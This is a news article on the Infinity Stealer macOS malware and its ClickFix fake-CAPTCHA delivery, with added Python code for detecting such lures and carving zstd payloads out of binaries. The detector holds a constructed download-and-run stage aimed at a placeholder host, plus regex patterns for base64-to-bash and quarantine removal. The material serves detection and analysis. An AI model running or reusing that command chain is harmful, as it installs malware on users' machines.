Sunday, March 29, 2026

New Infinity Stealer malware grabs macOS knowledge by way of ClickFix lures

A new info-stealing malware named Infinity Stealer is targeting macOS systems with a Python payload packaged as a native executable using the open-source Nuitka compiler.

The attack uses the ClickFix technique, presenting a fake CAPTCHA that mimics Cloudflare's human verification check to trick users into executing malicious code themselves.

Researchers at Malwarebytes say this is the first documented macOS campaign combining ClickFix delivery with a Python-based infostealer compiled using Nuitka.

Because Nuitka produces a native binary by translating the Python script into C and compiling it, the resulting executable is more resistant to static analysis.

Compared with PyInstaller, which bundles the Python interpreter together with the script's bytecode (which can be extracted and decompiled), a Nuitka build is more evasive because it yields a real native binary with no obvious bytecode layer, making reverse engineering considerably harder.

"The final payload is written in Python and compiled with Nuitka, producing a native macOS binary. That makes it harder to analyze and detect than typical Python-based malware," Malwarebytes says.

Attack chain

The attack begins with a ClickFix lure on the domain update-check[.]com, posing as a Cloudflare human verification step and asking the user to complete the "challenge" by pasting a base64-obfuscated curl command into the macOS Terminal. Because the victim runs the command themselves, the OS-level protections that would apply to a downloaded app are sidestepped.

[Image: the ClickFix step used in Infinity attacks. Source: Malwarebytes]

The command decodes a Bash script that writes the stage-2 Nuitka loader to /tmp, removes the quarantine flag, and launches it via 'nohup', passing the command-and-control (C2) address and a token through environment variables. The script then deletes itself and closes the Terminal window.
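The chain above (a base64 blob decoded and piped into a shell, a download into /tmp, the quarantine attribute stripped, a nohup launch with environment variables prefixed, self-deletion, and the Terminal closed) is a recognisable pattern in shell history, EDR process telemetry, or a Terminal clipboard. The following is an added example, not Malwarebytes' detection logic or anything recovered from the real payload: a small Python triage script that unpacks embedded base64 and scores a command line against those behaviours. The sample lure and stage script are constructed (placeholder host example.invalid, assumed environment variable names C2 and TOKEN, and an assumed osascript call to close Terminal, since the article does not say how that is done); the hit threshold of three is also an assumption.

```python
import base64
import re

# Behavioural indicators drawn from the attack chain described in the article.
# These are illustrative rules, not Malwarebytes' signatures.
INDICATORS = {
    "piped_to_shell":      re.compile(r"\|\s*(?:ba|z)?sh\b"),
    "base64_decode":       re.compile(r"base64\s+(?:-d|-D|--decode)\b"),
    "tmp_write":           re.compile(r"(?:-o|>)\s*/tmp/\S+"),
    "quarantine_removed":  re.compile(r"xattr\s+(?:-d\s+com\.apple\.quarantine|-c)\b"),
    "nohup_launch":        re.compile(r"\bnohup\b"),
    # VAR=value ... nohup: the loader started with C2/token passed in its environment
    "env_vars_prefixed":   re.compile(r"\b[A-Z_][A-Z0-9_]*=\S+(?:\s+[A-Z_][A-Z0-9_]*=\S+)*\s+nohup\b"),
    "self_delete":         re.compile(r'\brm\s+(?:-f\s+)?(?:"?\$0"?|/tmp/\S+)'),
    # Assumption: Terminal closed through osascript; the article gives no mechanism.
    "terminal_closed":     re.compile(r"osascript\b.*\bTerminal\b"),
}

# Runs of 40+ base64 alphabet characters; shorter runs are too often benign tokens.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_embedded_base64(cmd):
    """Return every long base64 run in cmd that decodes to printable text."""
    found = []
    for m in B64_RUN.finditer(cmd):
        blob = m.group(0)
        blob += "=" * (-len(blob) % 4)          # repair stripped padding
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        if all(c.isprintable() or c in "\n\t" for c in text):
            found.append(text)
    return found


def scan_command(cmd):
    """Match indicators against the command and against anything it hides in base64."""
    decoded = decode_embedded_base64(cmd)
    texts = [cmd] + decoded
    hits = {name for name, rx in INDICATORS.items() if any(rx.search(t) for t in texts)}
    return {"indicators": sorted(hits), "decoded": decoded}


def is_clickfix_like(cmd, min_hits=3):
    """Assumed threshold: three or more behaviours together is worth an alert."""
    return len(scan_command(cmd)["indicators"]) >= min_hits


# Constructed sample stage (NOT the real script): the behaviours the article lists,
# with a placeholder host and assumed variable names.
SAMPLE_STAGE = (
    "curl -fsSL https://example.invalid/UpdateHelper -o /tmp/UpdateHelper\n"
    "xattr -d com.apple.quarantine /tmp/UpdateHelper\n"
    "chmod +x /tmp/UpdateHelper\n"
    "C2=https://example.invalid TOKEN=abc123 nohup /tmp/UpdateHelper >/dev/null 2>&1 &\n"
    "rm -f /tmp/stage.sh\n"
    "osascript -e 'tell application \"Terminal\" to quit'\n"
)
# What the victim would paste: the stage hidden in base64 and piped straight into bash.
SAMPLE_LURE = "echo " + base64.b64encode(SAMPLE_STAGE.encode()).decode() + " | base64 -d | bash"
# A benign download into /tmp for comparison (one indicator, no alert).
BENIGN = "curl -fsSL https://example.invalid/release.tar.gz -o /tmp/release.tar.gz"

if __name__ == "__main__":
    for label, cmd in (("lure", SAMPLE_LURE), ("benign", BENIGN)):
        r = scan_command(cmd)
        print(f"{label}: alert={is_clickfix_like(cmd)} indicators={r['indicators']}")
```

Run it on a shell history export or on the `CommandLine` field of process-start events; the decoded stage is returned alongside the hits so an analyst can read what the victim actually executed rather than the base64 blob.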

The Nuitka loader is an 8.6 MB Mach-O binary that carries a zstd-compressed archive which unpacks to 35 MB and contains stage 3 (UpdateHelper.bin), the Infinity Stealer itself.
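Locating that embedded archive is the first step in pulling the stage-3 payload out of the loader. The block below is an added example, not Malwarebytes' tooling and not derived from the real loader: it scans a byte buffer for standard zstd frame magic (0xFD2FB528, stored little-endian as 28 B5 2F FD) and parses each frame header per RFC 8878 to report offset, declared content size, window size and checksum flag, rejecting hits whose reserved bit is set. The sample buffer is constructed and holds frame headers only, so nothing in it can be decompressed; the 35 MB content size is just the figure from the article written into the test frame.

```python
import struct

ZSTD_MAGIC = b"\x28\xb5\x2f\xfd"   # 0xFD2FB528 little-endian (RFC 8878)


def parse_zstd_frame_header(buf, off):
    """Parse the zstd frame header starting at buf[off] (the magic number).
    Returns a dict of header fields, or None if these bytes cannot be a frame header."""
    if buf[off:off + 4] != ZSTD_MAGIC or off + 5 > len(buf):
        return None
    fhd = buf[off + 4]                       # Frame_Header_Descriptor
    if fhd & 0x08:                           # reserved bit must be 0: cheap false-positive filter
        return None
    fcs_flag = fhd >> 6                      # Frame_Content_Size_flag
    single_segment = bool(fhd & 0x20)
    checksum = bool(fhd & 0x04)
    dict_flag = fhd & 0x03
    pos = off + 5

    window_size = None
    if not single_segment:                   # Window_Descriptor present
        if pos >= len(buf):
            return None
        wd = buf[pos]
        pos += 1
        exponent, mantissa = wd >> 3, wd & 7
        base = 1 << (10 + exponent)
        window_size = base + (base // 8) * mantissa

    dict_len = (0, 1, 2, 4)[dict_flag]
    if pos + dict_len > len(buf):
        return None
    dict_id = int.from_bytes(buf[pos:pos + dict_len], "little") if dict_len else None
    pos += dict_len

    fcs_len = (1 if single_segment else 0, 2, 4, 8)[fcs_flag]
    if pos + fcs_len > len(buf):
        return None
    content_size = None
    if fcs_len:
        content_size = int.from_bytes(buf[pos:pos + fcs_len], "little")
        if fcs_len == 2:                     # 2-byte field stores size - 256
            content_size += 256
    pos += fcs_len

    return {
        "offset": off,
        "header_len": pos - off,
        "content_size": content_size,
        "single_segment": single_segment,
        "checksum": checksum,
        "dict_id": dict_id,
        "window_size": window_size,
    }


def carve_zstd_frames(buf):
    """Return parsed headers for every plausible zstd frame found in buf."""
    frames, start = [], 0
    while True:
        off = buf.find(ZSTD_MAGIC, start)
        if off < 0:
            return frames
        hdr = parse_zstd_frame_header(buf, off)
        if hdr:
            frames.append(hdr)
        start = off + 1


# Constructed sample: padding, one frame header declaring a 35 MB content size with
# a checksum, a decoy magic with the reserved bit set, then a small single-segment frame.
SAMPLE = (
    b"\x00" * 64
    + ZSTD_MAGIC + b"\x84\x88" + struct.pack("<I", 35 * 1024 * 1024)
    + b"\xff" * 16
    + ZSTD_MAGIC + b"\x08" + b"\x00" * 8          # reserved bit set: not a real frame
    + ZSTD_MAGIC + b"\x20\x2a" + b"\x00" * 8      # single segment, 1-byte FCS = 42
)

if __name__ == "__main__":
    for f in carve_zstd_frames(SAMPLE):
        print(f)
```

Against a real binary, read the file into `buf`, take the offset of the frame whose declared content size matches the expected payload, and hand `buf[offset:]` to `zstd -d` or the `zstandard` module; a loader that stores its payload in a custom container rather than a standard frame will not show up here, so a miss is not proof there is no compressed payload.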

[Image: the malware's disassembly view. Source: Malwarebytes]

Before it begins collecting sensitive data, the malware performs anti-analysis checks to determine whether it is running in a virtualized or sandboxed environment.

Malwarebytes' analysis of the Python 3.11 payload found that the info-stealer can take screenshots and harvest the following data:

  • Credentials from Chromium-based browsers and Firefox
  • macOS Keychain entries
  • Cryptocurrency wallets
  • Plaintext secrets in developer files, such as .env

All stolen data is exfiltrated via HTTP POST requests to the C2, and a Telegram notification is sent to the threat actors once the operation completes.

Malwarebytes stresses that the appearance of malware like Infinity Stealer is further evidence that threats to macOS users are only becoming more advanced and more targeted.

Users should never paste commands they find online into Terminal unless they fully understand what those commands do.
